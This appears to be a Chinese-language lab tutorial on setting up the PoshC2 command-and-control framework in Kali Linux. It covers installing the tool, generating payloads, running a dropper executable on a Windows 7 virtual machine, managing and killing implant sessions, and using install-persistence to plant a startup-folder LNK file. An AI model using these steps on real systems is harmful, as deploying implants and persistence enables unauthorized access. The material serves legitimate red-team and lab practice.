0 环境
系统:
Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux
项目地址(PoshC2-7.3.0):
https://github.com/nettitude/PoshC2
文档:
https://poshc2.readthedocs.io/en/latest/install_and_setup/index.html
1 安装
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# sudo ./Install.sh
2 创建项目(默认创建的项目存在于 /var/poshc2/)
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-project -n howareyou
[+] Created Project: howareyou
[*] Now run posh-config to set your configuration
3 配置
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-config
4 启动(生成各种 payload,存在于 /var/poshc2/howareyou/payloads )
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-server
5 将其中的一个payload 移动到桌面,复制到win7虚拟机中运行(另外窗口)
┌──(root💀kali)-[/var/poshc2/howareyou/payloads]
└─# mv Posh_v2_dropper_migrate_x64.exe /home/kali/Desktop
6 创建用户(另外窗口)
┌──(root💀kali)-[/var/poshc2/howareyou/payloads]
└─# posh -u crashovverid
7 上线
8 交互
9 交互显示
10 关闭会话并退出
其他:
01 ####删除 会话
=============== PoshC2 Zip ===============
User: crashovverid
[5] : Seen:2021-02-01 20:16:01 | PID:2572 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[6] : Seen:2021-02-01 20:16:20 | PID:2580 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[8] : Seen:2021-02-01 21:09:06 | PID:2560 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[9] : Seen:2021-02-01 21:09:08 | PID:2720 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
Select ImplantID or ALL or Comma Separated List (Enter to refresh):: 5,6,8,9
5,6,8,9> kill-implant
Are you sure you want to terminate the implant ID 5? (Y/n) Y
Are you sure you want to terminate the implant ID 6? (Y/n) Y
Are you sure you want to terminate the implant ID 8? (Y/n) Y
Are you sure you want to terminate the implant ID 9? (Y/n) Y
5,6,8,9> quit
Are you sure you want to quit? (Y/n) Y
┌──(root💀kali)-[/var/poshc2]
└─#
02 第二个窗口(创建用户进行交互)
posh -u crashoverride
//交互--示例
PoshC2可以创建一个LNK文件并将其直接放置在Windows启动文件夹中以保持持久性。可以通过执行以下命令来调用此技术:
* Persistence (with powershell.exe):
====================================
install-persistence 1,2,3
remove-persistence 1,2,3
相关链接:
Window权限维持(四):快捷方式
系统安全 Bypass007 2019-12-04 8,007
https://www.secpulse.com/archives/119973.html
